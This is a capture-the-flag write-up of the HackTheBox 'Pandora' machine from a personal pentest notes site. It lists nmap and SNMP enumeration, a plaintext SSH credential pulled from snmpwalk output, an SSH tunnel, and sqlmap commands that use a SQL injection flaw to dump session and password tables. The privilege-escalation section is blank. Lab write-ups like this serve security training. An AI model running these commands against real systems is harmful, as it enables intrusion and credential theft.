[email protected]
Search…
[email protected]
About Calvin Lai (fkclai)
My Work
Exploit/CVE PoC
ZeroLogon Exploit
Remote Retrieved Chrome saved Encrypted Password
Twitter Control an RCE attack
Hacking Report (HTB)
Hits & Summary
Windows Machine
Linux Machine
Pandora 10.10.11.136
BountyHunter 10.10.11.100
CAP 10.10.10.245
Spectra 10.10.10.229
Ready 10.10.10.220
Doctor 10.10.10.209
Bucket 10.10.10.212
Blunder 10.10.10.191
Registry 10.10.10.159
Magic
Tabby
Penetration Testing Checklists
Web Application PenTest
Network/System PenTest
Mobile Application PenTest
Red Team (Windows)
01 Reconnaissance
02 Privileges Escalation
03 Lateral Movement
04 AD Attacks
05 Bypass-Evasion
06 Kerberos Attack
99 Basic Command
Exploitation Guide
01 Reconnaissance
02 Port Enumeration
03 Web Enumeration
04 Windows Enum & Exploit
05 File Enumeration
06 Reverse Shell Cheat Sheet
07 SQL Injection
08 BruteForce
09 XSS Bypass Checklist
10 Spring Boot
11 WPA
12 Payload list
Vuln Hub (Writeup)
MrRobot
CYBERRY
MATRIX 1
Node-1
DPwwn-1
DC7
AiWeb-2
AiWeb-1
BrainPan
CTF (Writeup)
Hacker One
CTF Learn
P.W.N. University - CTF 2018
HITCON
Pwnable
Useful Command/Tools
Windows
Linux
Offensive Security Lab & Exam
Lab
Powered By GitBook
Pandora 10.10.11.136

Background

Pandora is a Linux base machine from HackTheBox that required your patient on web searching technique with some encoding concepts and Python Hacking skill is required on the privilege escalation.
Target Machine: 10.10.11.136
Attacker Machine: 10.10.14.4

Hacking Process Part 0 – Service Scanning

Nmap

1) nmap -p- -T5 --min-rate=1000 10.10.11.136 -oG fkclai.nmap 2) nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.11.136 -o nmap-result.txt
Enumeration Strategies
No vulnerability was found on the SSH and HTTP service, it was going to review the web application to check any information leakage or misconfiguration.

Hacking Process Part 1 – Enumeration

With basic web enumeration using gobuster, a set of web pages was found and the following one was interesting with submission function. However, it does not find any interesting stuff
dirb http://pandora.htb/ /usr/share/wordlists/dirb/common.txt -o dirb-pandora.result
THINKINGS: checking UDP ports
nmap -sC -sV -sU -top-ports=20 pandora.htb
1
Nmap scan report for pandora.htb (10.10.11.136)
2
Host is up (0.27s latency).
3
4
PORT STATE SERVICE VERSION
5
53/udp closed domain
6
67/udp open|filtered dhcps
7
68/udp open|filtered dhcpc
8
69/udp closed tftp
9
123/udp open|filtered ntp
10
135/udp closed msrpc
11
137/udp open|filtered netbios-ns
12
138/udp open|filtered netbios-dgm
13
139/udp open|filtered netbios-ssn
14
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
15
| snmp-info:
16
| enterprise: net-snmp
17
| engineIDFormat: unknown
18
| engineIDData: 48fa95537765c36000000000
19
| snmpEngineBoots: 30
20
|_ snmpEngineTime: 20m46s
21
| snmp-processes:
22
| 1:
23
|
24
| 2:
25
|
26
| 3:
27
|
28
|_ 4:
29
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
30
|_ System uptime: 20m46.36s (124636 timeticks)
31
|_snmp-win32-software:
32
162/udp open|filtered snmptrap
33
445/udp open|filtered microsoft-ds
34
500/udp open|filtered isakmp
35
514/udp open|filtered syslog
36
520/udp closed route
37
631/udp closed ipp
38
1434/udp open|filtered ms-sql-m
39
1900/udp open|filtered upnp
40
4500/udp open|filtered nat-t-ike
41
49152/udp open|filtered unknown
42
Service Info: Host: pandora
43
44
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
45
Nmap done: 1 IP address (1 host up) scanned in 135.89 seconds
Copied!
Checking the opening port one by one

SNMP Port 161

161,162,10161,10162/udp - Pentesting SNMP
HackTricks
1
// using the command snmpwalk
2
snmpwalk -v 2c pandora.htb -c public> smpwalk.result
3
4
iso.3.6.1.2.1.25.4.2.1.5.870 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
Copied!
Get a username danieland password HotelBabylon23, try the SSH connection with this account

Hacking Process Part 2 – Gaining Foothold

Get the Initial access using the credential found at the SNMP connection string
Unfortunately, the account cannot access the user.txt
After reviewing the network, it found that there should be a website hosted internally, but it cannot be accessed outside.
Try to use SSH tunnelling to redirect the page outside
ssh -L 81:127.0.0.1:80 [email protected]
The credential found before cannot login this website
A CVE-2020-5844 was found on this v7.0NG.742_FIX_PERL2020, SQL injection vulnariblity was found. Using SQLMap to check the
sqlmap -u "http://127.0.0.1:81/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tsessions_php -C id_session,data --dump
It was found that the name of Database: pandora, table tsessions_php, and related field identified. Changed the command and executed it again
sqlmap -u "http://127.0.0.1:81/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tpassword_history -C id_pass,id_user,data_end,password,data_begin --dump

Hacking Process Part 3 – Privilege Escalation

Hacking Report (HTB) - Previous
Linux Machine
Next
BountyHunter 10.10.11.100
Last modified 4mo ago
Copy link
Contents
Background
Hacking Process Part 0 – Service Scanning
Nmap
Hacking Process Part 1 – Enumeration
Hacking Process Part 2 – Gaining Foothold
Hacking Process Part 3 – Privilege Escalation